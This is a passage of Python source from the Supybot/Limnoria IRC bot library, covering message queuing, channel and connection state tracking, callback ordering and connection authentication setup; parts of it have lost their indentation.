        ircmsgs.IrcMsg objects are immutable, so this method is expected to
        return another ircmsgs.IrcMsg object.  Obviously the same IrcMsg
        can be returned.
        """
        return msg
    def outFilter(self, irc, msg):
        """Used for filtering/modifying messages as they're leaving.
        As with inFilter, an IrcMsg is returned.
        """
        return msg
    def __call__(self, irc, msg):
        """Used for handling each message.

        Dispatches to the matching doCommand handler, if any.
        """
        method = self.dispatchCommand(msg.command)
        if method is not None:
            method(irc, msg)
    def reset(self):
        """Resets the callback. Called when reconnecting to the server."""
        pass
    def die(self):
        """Makes the callback die. Called when the parent Irc object dies."""
        pass
###
# Basic queue for IRC messages.  It doesn't presently (but should at some
# later point) reorder messages based on priority or penalty calculations.
###
# Commands dispatched before ordinary traffic by IrcMsgQueue.
_high = frozenset(['MODE', 'KICK', 'PONG', 'NICK', 'PASS', 'CAPAB'])
# Commands dispatched only when nothing else is pending.
_low = frozenset(['PRIVMSG', 'PING', 'WHO', 'NOTICE', 'JOIN'])
class IrcMsgQueue(object):
    """A three-tier priority queue of IrcMsgs.

    Messages whose command is in _high are returned first, then normal
    messages, then messages whose command is in _low.  JOINs are further
    rate-limited according to configuration.  A smarter implementation
    (scoring plus a heapq) would be the ideal way to do intelligent
    queuing, but this has proven good enough so far.
    """
    # NOTE(review): 'msgs' appears unused but is kept in __slots__ so the
    # class structure stays unchanged -- confirm before removing.
    __slots__ = ('msgs', 'highpriority', 'normal', 'lowpriority', 'lastJoin')
    def __init__(self, iterable=()):
        self.reset()
        for message in iterable:
            self.enqueue(message)
    def reset(self):
        """Clears the queue."""
        self.lastJoin = 0
        self.highpriority = smallqueue()
        self.normal = smallqueue()
        self.lowpriority = smallqueue()
    def enqueue(self, msg):
        """Enqueues a given message.

        Returns False (and drops the message) when it is already queued
        and duplicate suppression is configured; True otherwise.
        """
        if msg in self and \
           conf.supybot.protocols.irc.queuing.duplicates():
            s = str(msg).strip()
            log.info('Not adding message %q to queue, already added.', s)
            return False
        if msg.command in _high:
            target = self.highpriority
        elif msg.command in _low:
            target = self.lowpriority
        else:
            target = self.normal
        target.enqueue(msg)
        return True
    def dequeue(self):
        """Dequeues the next message, or returns None.

        None is returned when the queue is empty or when the only eligible
        message is a JOIN that is still being rate-limited.
        """
        if self.highpriority:
            return self.highpriority.dequeue()
        if self.normal:
            return self.normal.dequeue()
        if not self.lowpriority:
            return None
        msg = self.lowpriority.dequeue()
        if msg.command == 'JOIN':
            limit = conf.supybot.protocols.irc.queuing.rateLimit.join()
            now = time.time()
            if self.lastJoin + limit <= now:
                self.lastJoin = now
            else:
                # Too soon: push the JOIN back and report nothing ready.
                self.lowpriority.enqueue(msg)
                msg = None
        return msg
    def __contains__(self, msg):
        return (msg in self.normal
                or msg in self.lowpriority
                or msg in self.highpriority)
    def __bool__(self):
        return bool(self.highpriority) or bool(self.normal) \
            or bool(self.lowpriority)
    __nonzero__ = __bool__  # Python 2 compatibility.
    def __len__(self):
        return sum(map(len, (self.highpriority, self.lowpriority,
                             self.normal)))
    def __repr__(self):
        queued = list(chain(self.highpriority, self.normal,
                            self.lowpriority))
        return '%s(%r)' % (self.__class__.__name__, queued)
    __str__ = __repr__
###
# Maintains the state of IRC connection -- the most recent messages, the
# status of various modes (especially ops/halfops/voices) in channels, etc.
###
class ChannelState(utils.python.Object):
    """Everything we track about one channel: membership (with op, halfop,
    and voice subsets), ban masks, topic, modes, and creation time."""
    __slots__ = ('users', 'ops', 'halfops', 'bans',
                 'voices', 'topic', 'modes', 'created')
    def __init__(self):
        self.topic = ''
        self.created = 0
        self.modes = {}
        self.ops = ircutils.IrcSet()
        self.bans = ircutils.IrcSet()
        self.users = ircutils.IrcSet()
        self.voices = ircutils.IrcSet()
        self.halfops = ircutils.IrcSet()
    def isOp(self, nick):
        """Whether nick is opped."""
        return nick in self.ops
    def isOpPlus(self, nick):
        """Whether nick is at least opped (op is the highest tracked)."""
        return nick in self.ops
    def isVoice(self, nick):
        """Whether nick is voiced."""
        return nick in self.voices
    def isVoicePlus(self, nick):
        """Whether nick is voiced, halfopped, or opped."""
        return any(nick in group
                   for group in (self.voices, self.halfops, self.ops))
    def isHalfop(self, nick):
        """Whether nick is halfopped."""
        return nick in self.halfops
    def isHalfopPlus(self, nick):
        """Whether nick is halfopped or opped."""
        return any(nick in group for group in (self.halfops, self.ops))
    def addUser(self, user):
        "Adds a given user to the ChannelState.  Power prefixes are handled."
        sigils = '@%+&~!'
        nick = user.lstrip(sigils)
        if not nick:
            return
        # Sigil meanings: @ op; % halfop; + voice; & and ~ are UnrealIRCd
        # protected/owner; ! is UltimateIRCd protected.  The last three are
        # all treated as ops.
        while user and user[0] in sigils:
            marker = user[0]
            user = user[1:]
            assert user, 'Looks like my caller is passing chars, not nicks.'
            if marker in '@&~!':
                self.ops.add(nick)
            elif marker == '%':
                self.halfops.add(nick)
            elif marker == '+':
                self.voices.add(nick)
        self.users.add(nick)
    def replaceUser(self, oldNick, newNick):
        """Changes the user oldNick to newNick; used for NICK changes."""
        # No sigil handling here on purpose: the user keeps exactly the
        # categories they were already in, under the new name.
        for group in (self.users, self.ops, self.halfops, self.voices):
            if oldNick in group:
                group.remove(oldNick)
                group.add(newNick)
    def removeUser(self, user):
        """Removes a given user (and all their statuses) from the channel."""
        for group in (self.users, self.ops, self.halfops, self.voices):
            group.discard(user)
    def setMode(self, mode, value=None):
        """Records a non-membership channel mode (with optional argument)."""
        assert mode not in 'ovhbeq'
        self.modes[mode] = value
    def unsetMode(self, mode):
        """Forgets a non-membership channel mode, if currently set."""
        assert mode not in 'ovhbeq'
        if mode in self.modes:
            del self.modes[mode]
    def doMode(self, msg):
        """Applies the mode changes of a MODE message to this state."""
        tracked = {'o': self.ops, 'v': self.voices,
                   'h': self.halfops, 'b': self.bans}
        for (mode, value) in ircutils.separateModes(msg.args[1:]):
            (action, modeChar) = mode
            if modeChar in 'ovhbeq':
                # e and q are not tracked yet; their changes fall into a
                # throwaway set.
                group = tracked.get(modeChar, set())
                if action == '-':
                    group.discard(value)
                elif action == '+':
                    group.add(value)
            else:
                if action == '+':
                    self.setMode(modeChar, value)
                else:
                    assert action == '-'
                    self.unsetMode(modeChar)
    def __getstate__(self):
        # Serializes attributes in __slots__ order; __setstate__ relies on
        # exactly the same ordering.
        return [getattr(self, name) for name in self.__slots__]
    def __setstate__(self, t):
        for (name, value) in zip(self.__slots__, t):
            setattr(self, name, value)
    def __eq__(self, other):
        return all(getattr(self, name) == getattr(other, name)
                   for name in self.__slots__)
Batch = collections.namedtuple('Batch', 'type arguments messages')
class IrcState(IrcCommandDispatcher, log.Firewalled):
    """Maintains state of the Irc connection: recent message history,
    nick -> hostmask mappings, per-channel state, ISUPPORT tokens,
    IRCv3 capabilities, and open batches.  Should also become smarter.
    """
    # NOTE(review): log.Firewalled appears to use this mapping (method
    # name -> fallback) to keep exceptions in addMsg from propagating --
    # confirm the exact semantics in log.py.
    __firewalled__ = {'addMsg': None}
def __init__(self, history=None, supported=None,
nicksToHostmasks=None, channels=None,
capabilities_ack=None, capabilities_nak=None,
capabilities_ls=None):
if history is None:
history = RingBuffer(conf.supybot.protocols.irc.maxHistoryLength())
if supported is None:
supported = utils.InsensitivePreservingDict()
if nicksToHostmasks is None:
nicksToHostmasks = ircutils.IrcDict()
if channels is None:
channels = ircutils.IrcDict()
self.capabilities_ack = capabilities_ack or set()
self.capabilities_nak = capabilities_nak or set()
self.capabilities_ls = capabilities_ls or {}
self.ircd = None
self.supported = supported
self.history = history
self.channels = channels
self.nicksToHostmasks = nicksToHostmasks
self.batches = {}
def reset(self):
"""Resets the state to normal, unconnected state."""
self.history.reset()
self.channels.clear()
self.supported.clear()
self.nicksToHostmasks.clear()
self.history.resize(conf.supybot.protocols.irc.maxHistoryLength())
self.batches = {}
    def __reduce__(self):
        # Pickle support.  NOTE(review): capabilities_* and batches are not
        # preserved across pickling -- confirm this is intentional.
        return (self.__class__, (self.history, self.supported,
                                 self.nicksToHostmasks, self.channels))
def __eq__(self, other):
return self.history == other.history and \
self.channels == other.channels and \
self.supported == other.supported and \
self.nicksToHostmasks == other.nicksToHostmasks and \
self.batches == other.batches
    def __ne__(self, other):
        # Explicit for Python 2 compatibility (cf. the __nonzero__ alias in
        # IrcMsgQueue); Python 3 would derive this from __eq__.
        return not self == other
def copy(self):
ret = self.__class__()
ret.history = copy.deepcopy(self.history)
ret.nicksToHostmasks = copy.deepcopy(self.nicksToHostmasks)
ret.channels = copy.deepcopy(self.channels)
ret.batches = copy.deepcopy(self.batches)
return ret
    def addMsg(self, irc, msg):
        """Updates the state based on the irc object and the message."""
        self.history.append(msg)
        if ircutils.isUserHostmask(msg.prefix) and not msg.command == 'NICK':
            # Cache the sender's full hostmask.  NICK is excluded because
            # its prefix still carries the old nick; doNick handles renames.
            self.nicksToHostmasks[msg.nick] = msg.prefix
        if 'batch' in msg.server_tags:
            # Collect messages belonging to an open IRCv3 batch.
            batch = msg.server_tags['batch']
            assert batch in self.batches, \
                'Server references undeclared batch %s' % batch
            self.batches[batch].messages.append(msg)
        # Dispatch to the matching doCommand handler (after the message has
        # been recorded in history, so handlers can inspect it there).
        method = self.dispatchCommand(msg.command)
        if method is not None:
            method(irc, msg)
    def getTopic(self, channel):
        """Returns the topic for a given channel.

        Raises KeyError if the channel is not being tracked.
        """
        return self.channels[channel].topic
    def nickToHostmask(self, nick):
        """Returns the hostmask for a given nick.

        Raises KeyError if no hostmask has been seen for that nick.
        """
        return self.nicksToHostmasks[nick]
    def do004(self, irc, msg):
        """Handles parsing the 004 reply (RPL_MYINFO).
        The ircd version string and supported user/channel modes are
        cached."""
        # msg.args = [nick, server, ircd-version, umodes, modes,
        # modes that require arguments? (non-standard)]
        self.ircd = msg.args[2]
        self.supported['umodes'] = frozenset(msg.args[3])
        self.supported['chanmodes'] = frozenset(msg.args[4])
_005converters = utils.InsensitivePreservingDict({
'modes': int,
'keylen': int,
'nicklen': int,
'userlen': int,
'hostlen': int,
'kicklen': int,
'awaylen': int,
'silence': int,
'topiclen': int,
'channellen': int,
'maxtargets': int,
'maxnicklen': int,
'maxchannels': int,
'watch': int, # DynastyNet, EnterTheGame
})
def _prefixParser(s):
if ')' in s:
(left, right) = s.split(')')
assert left[0] == '(', 'Odd PREFIX in 005: %s' % s
left = left[1:]
assert len(left) == len(right), 'Odd PREFIX in 005: %s' % s
return dict(list(zip(left, right)))
else:
return dict(list(zip('ovh', s)))
_005converters['prefix'] = _prefixParser
del _prefixParser
def _maxlistParser(s):
modes = ''
limits = []
pairs = s.split(',')
for pair in pairs:
(mode, limit) = pair.split(':', 1)
modes += mode
limits += (int(limit),) * len(mode)
return dict(list(zip(modes, limits)))
_005converters['maxlist'] = _maxlistParser
del _maxlistParser
def _maxbansParser(s):
# IRCd using a MAXLIST style string (IRCNet)
if ':' in s:
modes = ''
limits = []
pairs = s.split(',')
for pair in pairs:
(mode, limit) = pair.split(':', 1)
modes += mode
limits += (int(limit),) * len(mode)
d = dict(list(zip(modes, limits)))
assert 'b' in d
return d['b']
else:
return int(s)
_005converters['maxbans'] = _maxbansParser
del _maxbansParser
def do005(self, irc, msg):
for arg in msg.args[1:-1]: # 0 is nick, -1 is "are supported"
if '=' in arg:
(name, value) = arg.split('=', 1)
converter = self._005converters.get(name, lambda x: x)
try:
self.supported[name] = converter(value)
except Exception:
log.exception('Uncaught exception in 005 converter:')
log.error('Name: %s, Converter: %s', name, converter)
else:
self.supported[arg] = None
def do352(self, irc, msg):
# WHO reply.
(nick, user, host) = (msg.args[5], msg.args[2], msg.args[3])
hostmask = '%s!%s@%s' % (nick, user, host)
self.nicksToHostmasks[nick] = hostmask
def do354(self, irc, msg):
# WHOX reply.
if len(msg.args) != 6 or msg.args[1] != '1':
return
(__, ___, user, host, nick, ___) = msg.args
hostmask = '%s!%s@%s' % (nick, user, host)
self.nicksToHostmasks[nick] = hostmask
def do353(self, irc, msg):
# NAMES reply.
(__, type, channel, items) = msg.args
if channel not in self.channels:
self.channels[channel] = ChannelState()
c = self.channels[channel]
for item in items.split():
if ircutils.isUserHostmask(item):
name = ircutils.nickFromHostmask(item)
self.nicksToHostmasks[name] = name
else:
name = item
c.addUser(name)
if type == '@':
c.modes['s'] = None
def doChghost(self, irc, msg):
(user, host) = msg.args
nick = msg.nick
hostmask = '%s!%s@%s' % (nick, user, host)
self.nicksToHostmasks[nick] = hostmask
def doJoin(self, irc, msg):
for channel in msg.args[0].split(','):
if channel in self.channels:
self.channels[channel].addUser(msg.nick)
elif msg.nick: # It must be us.
chan = ChannelState()
chan.addUser(msg.nick)
self.channels[channel] = chan
# I don't know why this assert was here.
#assert msg.nick == irc.nick, msg
def do367(self, irc, msg):
# Example:
# :server 367 user #chan some!random@user evil!channel@op 1356276459
try:
state = self.channels[msg.args[1]]
except KeyError:
# We have been kicked of the channel before the server replied to
# the MODE +b command.
pass
else:
state.bans.add(msg.args[2])
    def doMode(self, irc, msg):
        # MODE change; only channel modes are tracked here.  Create the
        # ChannelState lazily if we haven't seen the channel yet.
        channel = msg.args[0]
        if ircutils.isChannel(channel): # There can be user modes, as well.
            try:
                chan = self.channels[channel]
            except KeyError:
                chan = ChannelState()
                self.channels[channel] = chan
            chan.doMode(msg)
    def do324(self, irc, msg):
        # RPL_CHANNELMODEIS: the full mode listing for a channel.  Prefix
        # modes (o/v/h) describe users, not channel state, so skip them.
        channel = msg.args[1]
        try:
            chan = self.channels[channel]
        except KeyError:
            chan = ChannelState()
            self.channels[channel] = chan
        for (mode, value) in ircutils.separateModes(msg.args[2:]):
            modeChar = mode[1]
            if mode[0] == '+' and mode[1] not in 'ovh':
                chan.setMode(modeChar, value)
            elif mode[0] == '-' and mode[1] not in 'ovh':
                chan.unsetMode(modeChar)
    def do329(self, irc, msg):
        # RPL_CREATIONTIME.  This is the last part of an empty mode.
        channel = msg.args[1]
        try:
            chan = self.channels[channel]
        except KeyError:
            chan = ChannelState()
            self.channels[channel] = chan
        chan.created = int(msg.args[2])
    def doPart(self, irc, msg):
        # If we parted, drop the whole channel state; otherwise just
        # remove the departing user.
        for channel in msg.args[0].split(','):
            try:
                chan = self.channels[channel]
            except KeyError:
                continue
            if ircutils.strEqual(msg.nick, irc.nick):
                del self.channels[channel]
            else:
                chan.removeUser(msg.nick)
    def doKick(self, irc, msg):
        # Like doPart, but for KICK; msg.args[1] may list several nicks.
        (channel, users) = msg.args[:2]
        chan = self.channels[channel]
        for user in users.split(','):
            if ircutils.strEqual(user, irc.nick):
                del self.channels[channel]
                return
            else:
                chan.removeUser(user)
    def doQuit(self, irc, msg):
        # Remove the user from every channel, tagging the message with the
        # channels they were on so callbacks can still see them.
        channel_names = ircutils.IrcSet()
        for (name, channel) in self.channels.items():
            if msg.nick in channel.users:
                channel_names.add(name)
                channel.removeUser(msg.nick)
        # Remember which channels the user was on
        msg.tag('channels', channel_names)
        if msg.nick in self.nicksToHostmasks:
            # If we're quitting, it may not be.
            del self.nicksToHostmasks[msg.nick]
    def doTopic(self, irc, msg):
        # TOPIC command seen on the wire (set, or query with one arg).
        if len(msg.args) == 1:
            return # Empty TOPIC for information. Does not affect state.
        try:
            chan = self.channels[msg.args[0]]
            chan.topic = msg.args[1]
        except KeyError:
            pass # We don't have to be in a channel to send a TOPIC.
    def do332(self, irc, msg):
        # RPL_TOPIC, presumably only sent for channels we are in, so no
        # KeyError guard here -- TODO confirm against server behavior.
        chan = self.channels[msg.args[1]]
        chan.topic = msg.args[2]
    def doNick(self, irc, msg):
        # Someone (possibly us) changed nick: migrate the hostmask cache
        # entry and update membership in every tracked channel.
        newNick = msg.args[0]
        oldNick = msg.nick
        try:
            if msg.user and msg.host:
                # Nick messages being handed out from the bot itself won't
                # have the necessary prefix to make a hostmask.
                newHostmask = ircutils.joinHostmask(newNick,msg.user,msg.host)
                self.nicksToHostmasks[newNick] = newHostmask
            del self.nicksToHostmasks[oldNick]
        except KeyError:
            pass
        channel_names = ircutils.IrcSet()
        for (name, channel) in self.channels.items():
            if msg.nick in channel.users:
                channel_names.add(name)
                channel.replaceUser(oldNick, newNick)
        # Tag the channels the user was on, for callbacks.
        msg.tag('channels', channel_names)
    def doBatch(self, irc, msg):
        # IRCv3 BATCH: '+name' opens a batch, '-name' closes it.  On
        # close, the collected Batch object is attached to the closing
        # message via a tag.
        batch_name = msg.args[0][1:]
        if msg.args[0].startswith('+'):
            batch_type = msg.args[1]
            batch_arguments = tuple(msg.args[2:])
            self.batches[batch_name] = Batch(type=batch_type,
                arguments=batch_arguments, messages=[])
        elif msg.args[0].startswith('-'):
            batch = self.batches.pop(batch_name)
            msg.tag('batch', batch)
        else:
            assert False, msg.args[0]
###
# The basic class for handling a connection to an IRC server.  Accepts
# callbacks of the IrcCallback interface. Public attributes include 'driver',
# 'queue', and 'state', in addition to the standard nick/user/ident attributes.
###
# Shared default callback list: Irc.__init__ deliberately uses this mutable
# list as its default argument so Irc instances created without an explicit
# list share one set of callbacks (see the comment above Irc.__init__).
_callbacks = []
class Irc(IrcCommandDispatcher, log.Firewalled):
    """The base class for an IRC connection.
    Handles PING commands already.
    """
    # Methods firewalled against exceptions (log.Firewalled).
    __firewalled__ = {'die': None,
                      'feedMsg': None,
                      'takeMsg': None,}
    # Numerics/commands whose first argument is our nick; feedMsg uses
    # this set to keep self.nick in sync with what the server calls us.
    _nickSetters = set(['001', '002', '003', '004', '250', '251', '252',
                        '254', '255', '265', '266', '372', '375', '376',
                        '333', '353', '332', '366', '005'])
    # We specifically want these callbacks to be common between all Ircs,
    # that's why we don't do the normal None default with a check.
    def __init__(self, network, callbacks=_callbacks):
        self.zombie = False  # Set by die(); see takeMsg/queueMsg.
        world.ircs.append(self)
        self.network = network
        self.startedAt = time.time()
        self.callbacks = callbacks
        self.state = IrcState()
        self.queue = IrcMsgQueue()  # Throttled queue for normal messages.
        self.fastqueue = smallqueue()  # Unthrottled queue; see sendMsg.
        self.driver = None # The driver should set this later.
        self._setNonResettingVariables()
        self._queueConnectMessages()
        self.startedSync = ircutils.IrcDict()  # channel -> join-sync start time.
        self.monitoring = ircutils.IrcDict()  # MONITOR refcounts; see monitor().
def isChannel(self, s):
"""Helper function to check whether a given string is a channel on
the network this Irc object is connected to."""
kw = {}
if 'chantypes' in self.state.supported:
kw['chantypes'] = self.state.supported['chantypes']
if 'channellen' in self.state.supported:
kw['channellen'] = self.state.supported['channellen']
return ircutils.isChannel(s, **kw)
def isNick(self, s):
kw = {}
if 'nicklen' in self.state.supported:
kw['nicklen'] = self.state.supported['nicklen']
return ircutils.isNick(s, **kw)
    # This *isn't* threadsafe!
    def addCallback(self, callback):
        """Adds a callback to the callbacks list.

        After appending, the whole list is re-ordered with a topological
        sort so each callback's callPrecedence() constraints (callbacks
        that must run before/after it) are respected.

        :param callback: A callback object
        :type callback: supybot.irclib.IrcCallback
        """
        assert not self.getCallback(callback.name())
        self.callbacks.append(callback)
        # This is the new list we're building, which will be tsorted.
        cbs = []
        # The vertices are self.callbacks itself. Now we make the edges.
        edges = set()
        for cb in self.callbacks:
            (before, after) = cb.callPrecedence(self)
            assert cb not in after, 'cb was in its own after.'
            assert cb not in before, 'cb was in its own before.'
            for otherCb in before:
                edges.add((otherCb, cb))
            for otherCb in after:
                edges.add((cb, otherCb))
        def getFirsts():
            # A "first" is a vertex with no incoming edge, i.e. a callback
            # with no unsatisfied predecessor.
            firsts = set(self.callbacks) - set(cbs)
            for (before, after) in edges:
                firsts.discard(after)
            return firsts
        firsts = getFirsts()
        while firsts:
            # Then we add these to our list of cbs, and remove all edges that
            # originate with these cbs.
            for cb in firsts:
                cbs.append(cb)
                edgesToRemove = []
                for edge in edges:
                    if edge[0] is cb:
                        edgesToRemove.append(edge)
                for edge in edgesToRemove:
                    edges.remove(edge)
            firsts = getFirsts()
        # If anything was dropped, there was a precedence cycle.
        assert len(cbs) == len(self.callbacks), \
               'cbs: %s, self.callbacks: %s' % (cbs, self.callbacks)
        self.callbacks[:] = cbs
def getCallback(self, name):
"""Gets a given callback by name."""
name = name.lower()
for callback in self.callbacks:
if callback.name().lower() == name:
return callback
else:
return None
def removeCallback(self, name):
"""Removes a callback from the callback list."""
name = name.lower()
def nameMatches(cb):
return cb.name().lower() == name
(bad, good) = utils.iter.partition(nameMatches, self.callbacks)
self.callbacks[:] = good
return bad
    def queueMsg(self, msg):
        """Queues a message to be sent to the server.

        Returns False (and drops the message) when this Irc is already a
        zombie, i.e. die() has been called."""
        if not self.zombie:
            return self.queue.enqueue(msg)
        else:
            log.warning('Refusing to queue %r; %s is a zombie.', msg, self)
            return False
    def sendMsg(self, msg):
        """Queues a message to be sent to the server *immediately*"""
        if not self.zombie:
            self.fastqueue.enqueue(msg)
        else:
            log.warning('Refusing to send %r; %s is a zombie.', msg, self)
    def takeMsg(self):
        """Called by the IrcDriver; takes a message to be sent.

        Priority: fastqueue first, then the throttled normal queue; when
        both are empty and we're connected, this is also where periodic
        PINGs are generated.  Returns None when nothing is to be sent.
        """
        if not self.callbacks:
            log.critical('No callbacks in %s.', self)
        now = time.time()
        msg = None
        if self.fastqueue:
            msg = self.fastqueue.dequeue()
        elif self.queue:
            if now-self.lastTake <= conf.supybot.protocols.irc.throttleTime():
                log.debug('Irc.takeMsg throttling.')
            else:
                self.lastTake = now
                msg = self.queue.dequeue()
        elif self.afterConnect and \
             conf.supybot.protocols.irc.ping() and \
             now > self.lastping + conf.supybot.protocols.irc.ping.interval():
            if self.outstandingPing:
                # Previous PING never got a PONG; assume a dead link.
                s = 'Ping sent at %s not replied to.' % \
                    log.timestamp(self.lastping)
                log.warning(s)
                self.feedMsg(ircmsgs.error(s))
                self.driver.reconnect()
            elif not self.zombie:
                self.lastping = now
                now = str(int(now))
                self.outstandingPing = True
                self.queueMsg(ircmsgs.ping(now))
        if msg:
            for callback in reversed(self.callbacks):
                msg = callback.outFilter(self, msg)
                if msg is None:
                    # A callback vetoed this message; take the next one.
                    log.debug('%s.outFilter returned None.', callback.name())
                    return self.takeMsg()
            world.debugFlush()
            if len(str(msg)) > 512:
                # Yes, this violates the contract, but at this point it doesn't
                # matter.  That's why we gotta go munging in private attributes
                #
                # I'm changing this to a log.debug to fix a possible loop in
                # the LogToIrc plugin.  Since users can't do anything about
                # this issue, there's no fundamental reason to make it a
                # warning.
                log.debug('Truncating %r, message is too long.', msg)
                msg._str = msg._str[:500] + '\r\n'
                msg._len = len(str(msg))
            # I don't think we should do this.  Why should it matter?  If it's
            # something important, then the server will send it back to us,
            # and if it's just a privmsg/notice/etc., we don't care.
            # On second thought, we need this for testing.
            if world.testing:
                self.state.addMsg(self, msg)
            log.debug('Outgoing message (%s): %s', self.network, str(msg).rstrip('\r\n'))
            return msg
        elif self.zombie:
            # We kill the driver here so it doesn't continue to try to
            # take messages from us.
            self.driver.die()
            self._reallyDie()
        else:
            return None
    # 4xx/5xx numerics are server error replies; see feedMsg below.
    _numericErrorCommandRe = re.compile(r'^[45][0-9][0-9]$')
    def feedMsg(self, msg):
        """Called by the IrcDriver; feeds a message received.

        Tags the message, keeps nick/prefix/server attributes in sync,
        dispatches to the do* handler for the command, updates self.state,
        and finally runs the message through each callback's inFilter and
        __call__.
        """
        msg.tag('receivedBy', self)
        msg.tag('receivedOn', self.network)
        msg.tag('receivedAt', time.time())
        # NOTE(review): 'channel' is computed here but never used below.
        if msg.args and self.isChannel(msg.args[0]):
            channel = msg.args[0]
        else:
            channel = None
        preInFilter = str(msg).rstrip('\r\n')
        log.debug('Incoming message (%s): %s', self.network, preInFilter)
        # Yeah, so this is odd.  Some networks (oftc) seem to give us certain
        # messages with our nick instead of our prefix.  We'll fix that here.
        if msg.prefix == self.nick:
            log.debug('Got one of those odd nick-instead-of-prefix msgs.')
            msg = ircmsgs.IrcMsg(prefix=self.prefix, msg=msg)
        # This catches cases where we know our own nick (from sending it to the
        # server) but we don't yet know our prefix.
        if msg.nick == self.nick and self.prefix != msg.prefix:
            self.prefix = msg.prefix
        # This keeps our nick and server attributes updated.
        if msg.command in self._nickSetters:
            if msg.args[0] != self.nick:
                self.nick = msg.args[0]
                log.debug('Updating nick attribute to %s.', self.nick)
            if msg.prefix != self.server:
                self.server = msg.prefix
                log.debug('Updating server attribute to %s.', self.server)
        # Dispatch to specific handlers for commands.
        method = self.dispatchCommand(msg.command)
        if method is not None:
            method(msg)
        elif self._numericErrorCommandRe.search(msg.command):
            log.error('Unhandled error message from server: %r' % msg)
        # Now update the IrcState object.
        try:
            self.state.addMsg(self, msg)
        except:
            log.exception('Exception in update of IrcState object:')
        # Now call the callbacks.
        world.debugFlush()
        for callback in self.callbacks:
            try:
                m = callback.inFilter(self, msg)
                if not m:
                    log.debug('%s.inFilter returned None', callback.name())
                    return
                msg = m
            except:
                log.exception('Uncaught exception in inFilter:')
        world.debugFlush()
        postInFilter = str(msg).rstrip('\r\n')
        if postInFilter != preInFilter:
            log.debug('Incoming message (post-inFilter): %s', postInFilter)
        for callback in self.callbacks:
            try:
                if callback is not None:
                    callback(self, msg)
            except:
                log.exception('Uncaught exception in callback:')
        world.debugFlush()
    def die(self):
        """Makes the Irc object *promise* to die -- but it won't die (of its
        own volition) until all its queues are clear.  Isn't that cool?"""
        self.zombie = True
        if not self.afterConnect:
            # Not connected yet, so there's nothing to flush; die now.
            self._reallyDie()
    # This is useless because it's in world.ircs, so it won't be deleted until
    # the program exits.  Just figured you might want to know.
    #def __del__(self):
    #    self._reallyDie()
    def reset(self):
        """Resets the Irc object.  Called when the driver reconnects."""
        self._setNonResettingVariables()
        self.state.reset()
        self.queue.reset()
        self.fastqueue.reset()
        self.startedSync.clear()
        for callback in self.callbacks:
            callback.reset()
        self._queueConnectMessages()
    def _setNonResettingVariables(self):
        # (Re)initializes per-connection state; despite the name this IS
        # called from reset() as well as __init__.
        # Configuration stuff.
        network_config = conf.supybot.networks.get(self.network)
        def get_value(name):
            # Network-specific setting, falling back to the global default.
            return getattr(network_config, name)() or \
                getattr(conf.supybot, name)()
        self.nick = get_value('nick')
        self.user = get_value('user')
        self.ident = get_value('ident')
        self.alternateNicks = conf.supybot.nick.alternates()[:]
        self.password = network_config.password()
        self.prefix = '%s!%s@%s' % (self.nick, self.ident, 'unset.domain')
        # The rest.
        self.lastTake = 0
        self.server = 'unset'
        self.afterConnect = False
        self.startedAt = time.time()
        self.lastping = time.time()
        self.outstandingPing = False
        self.capNegociationEnded = False
        # STARTTLS is only required when the connection isn't already SSL.
        self.requireStarttls = not network_config.ssl() and \
                network_config.requireStarttls()
        self.resetSasl()
    def resetSasl(self):
        # Rebuilds the ordered list of SASL mechanisms to try, based on
        # which credentials/keys/certs are configured.
        network_config = conf.supybot.networks.get(self.network)
        self.sasl_authenticated = False
        self.sasl_username = network_config.sasl.username()
        self.sasl_password = network_config.sasl.password()
        self.sasl_ecdsa_key = network_config.sasl.ecdsa_key()
        self.authenticate_decoder = None
        self.sasl_next_mechanisms = []
        self.sasl_current_mechanism = None
        for mechanism in network_config.sasl.mechanisms():
            if mechanism == 'ecdsa-nist256p-challenge' and \
                    ecdsa and self.sasl_username and self.sasl_ecdsa_key:
                self.sasl_next_mechanisms.append(mechanism)
            elif mechanism == 'external' and (
                    network_config.certfile() or
                    conf.supybot.protocols.irc.certfile()):
                self.sasl_next_mechanisms.append(mechanism)
            elif mechanism == 'plain' and \
                    self.sasl_username and self.sasl_password:
                self.sasl_next_mechanisms.append(mechanism)
        if self.sasl_next_mechanisms:
            # NOTE(review): this mutates the CLASS-level set below, so once
            # any instance enables SASL every Irc requests it -- confirm this
            # sharing is intended.
            self.REQUEST_CAPABILITIES.add('sasl')
    # IRCv3 capabilities we request from the server (see doCapLs/doCapNew).
    REQUEST_CAPABILITIES = set(['account-notify', 'extended-join',
        'multi-prefix', 'metadata-notify', 'account-tag',
        'userhost-in-names', 'invite-notify', 'server-time',
        'chghost', 'batch', 'away-notify'])
    def _queueConnectMessages(self):
        if self.zombie:
            self.driver.die()
            self._reallyDie()
            return
        # Start IRCv3 capability negotiation; registration continues in
        # sendAuthenticationMessages (possibly after a STARTTLS upgrade).
        self.sendMsg(ircmsgs.IrcMsg(command='CAP', args=('LS', '302')))
        if self.requireStarttls:
            self.sendMsg(ircmsgs.IrcMsg(command='STARTTLS'))
        else:
            self.sendAuthenticationMessages()
    def do670(self, irc, msg):
        """STARTTLS accepted: upgrade the socket, then register."""
        log.info('%s: Starting TLS session.', self.network)
        self.requireStarttls = False
        self.driver.starttls()
        self.sendAuthenticationMessages()
    def do691(self, irc, msg):
        """STARTTLS refused: give up on this connection and reconnect."""
        log.error('%s: Server refused STARTTLS: %s', self.network, msg.args[0])
        self.feedMsg(ircmsgs.error('STARTTLS upgrade refused by the server'))
        self.driver.reconnect()
    def sendAuthenticationMessages(self):
        """Sends the registration commands: PASS (if configured), NICK,
        and USER."""
        # Notes:
        # * using sendMsg instead of queueMsg because these messages cannot
        #   be throttled.
        if self.password:
            log.info('%s: Queuing PASS command, not logging the password.',
                     self.network)
            self.sendMsg(ircmsgs.password(self.password))
        log.debug('%s: Sending NICK command, nick is %s.',
                  self.network, self.nick)
        self.sendMsg(ircmsgs.nick(self.nick))
        log.debug('%s: Sending USER command, ident is %s, user is %s.',
                  self.network, self.ident, self.user)
        self.sendMsg(ircmsgs.user(self.ident, self.user))
def endCapabilityNegociation(self):
if not self.capNegociationEnded:
self.capNegociationEnded = True
self.sendMsg(ircmsgs.IrcMsg(command='CAP', args=('END',)))
def sendSaslString(self, string):
for chunk in ircutils.authenticate_generator(string):
self.sendMsg(ircmsgs.IrcMsg(command='AUTHENTICATE',
args=(chunk,)))
    def tryNextSaslMechanism(self):
        """Starts the next configured SASL mechanism, or ends capability
        negotiation when none are left to try."""
        if self.sasl_next_mechanisms:
